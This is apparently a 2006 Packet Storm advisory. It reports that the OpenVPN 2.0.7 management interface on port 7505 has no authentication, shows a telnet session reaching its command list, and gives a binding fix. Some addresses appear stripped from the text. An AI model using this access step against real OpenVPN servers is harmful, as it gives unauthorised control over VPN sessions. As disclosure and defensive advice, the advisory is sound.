Type packetstorm
Reporter c0redump
Modified 2006-05-06T00:00:00


There is a flaw (well more a stupid design than anything else) in OpenVPN  
2.0.7 (and below) in the the Remote Management Interface that allows an  
attacker to gain complete control because there is NO AUTHENTICATION (YES NO  
AUTHENTICATION AT ALL!). This can be carried out from within the LAN that  
the OpenVPN server is running on, over the VPN itself or via the internet.   
This happens  
because the management interface can be binded to an internet accessible IP  
address. Not good!  
Simply telnet to the OpenVPN server running the remote management interface  
on port 7505.  
root@trinity# telnet ********* 7505  
Trying *********...  
Connected to *********.  
Escape character is '^]'.  
>INFO:OpenVPN Management Interface Version 1 -- type 'help' for more info  
Management Interface for OpenVPN 2.0_rc14 i686-suse-linux [SSL] [LZO]  
[EPOLL] built on Feb 3 2005  
echo [on|off] [N|all] : Like log, but only show messages in echo buffer.  
exit|quit : Close management session.  
help : Print this message.  
hold [on|off|release] : Set/show hold flag to on/off state, or  
release current hold and start tunnel.  
kill cn : Kill the client instance(s) having common name cn.  
kill IP:port : Kill the client instance connecting from IP:port.  
log [on|off] [N|all] : Turn on/off realtime log display  
+ show last N lines or 'all' for entire history.  
mute [n] : Set log mute level to n, or show level if n is  
net : (Windows only) Show network info and routing table.  
password type p : Enter password p for a queried OpenVPN password.  
signal s : Send signal s to daemon,  
state [on|off] [N|all] : Like log, but show state history.  
status [n] : Show current daemon status info using format #n.  
test n : Produce n lines of output for testing/debugging.  
username type u : Enter username u for a queried OpenVPN username.  
verb [n] : Set log verbosity level to n, or show if n is  
version : Show current version number.  
Connection closed by foreign host.  
The fix? Make sure you bind the remote management interface to or  
a local network address (however, the later will not stop you getting pwned  
internally, obviously).  
A quote from the OpenVPN guys themselves:  
"The management protocol is currently cleartext without an explicit security  
layer. For this reason, it is recommended that the management interface  
either listen on localhost ( or on the local VPN address. It's  
possible to remotely connect to the management interface over the VPN  
itself, though some capabilities will be limited in this mode, such as the  
ability to provide private key passwords."  
"Future versions of the management interface may allow out-of-band  
connections (i.e. not over the VPN) and secured with SSL/TLS."  
OMG *&$%*%# software vendors, please don't release stuff without  
#hacktech @ undernet